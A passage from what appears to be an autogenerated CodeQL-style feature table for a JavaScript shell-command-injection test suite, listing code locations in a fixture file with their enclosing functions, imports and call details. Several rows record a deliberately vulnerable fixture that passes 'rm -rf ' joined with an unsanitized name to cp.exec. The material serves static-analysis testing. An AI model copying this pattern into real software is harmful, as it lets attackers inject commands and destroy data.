name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:36:14:39 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:36:14:39 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:36:14:39 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:36:14:39 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:36:14:39 | name | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:36:14:39 | name | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:36:14:39 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:14:36:14:39 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:3 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:3 | cp | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:8 | cp.exec | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:26 | cp.exec ... + name) | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:5:15:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:5:15:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:5:15:8 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:5:15:8 | exec | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:5:15:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:10:15:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:10:15:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:10:15:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:10:15:18 | "rm -rf " | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:10:15:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:10:15:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:10:15:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:10:15:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:10:15:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:10:15:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:10:15:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:10:15:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:10:15:25 | "rm -rf " + name | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:10:15:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:10:15:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:22:15:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:22:15:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:22:15:25 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:22:15:25 | name | enclosingFunctionName | bar | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:22:15:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:22:15:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:0 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:0 | this | enclosingFunctionName | cla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:0 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:18 | 'arguments' object of function cla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:18 | 'arguments' object of function cla | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:18 | 'arguments' object of function cla | enclosingFunctionName | cla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:18 | 'arguments' object of function cla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:18 | exceptional return of function cla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:18 | exceptional return of function cla | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:18 | exceptional return of function cla | enclosingFunctionName | cla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:18 | exceptional return of function cla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:18 | function cla() { } | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:18 | function cla() { } | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:18 | function cla() { } | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:18 | return of function cla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:18 | return of function cla | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:18 | return of function cla | enclosingFunctionName | cla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:1:18:18 | return of function cla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:10:18:12 | cla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:10:18:12 | cla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 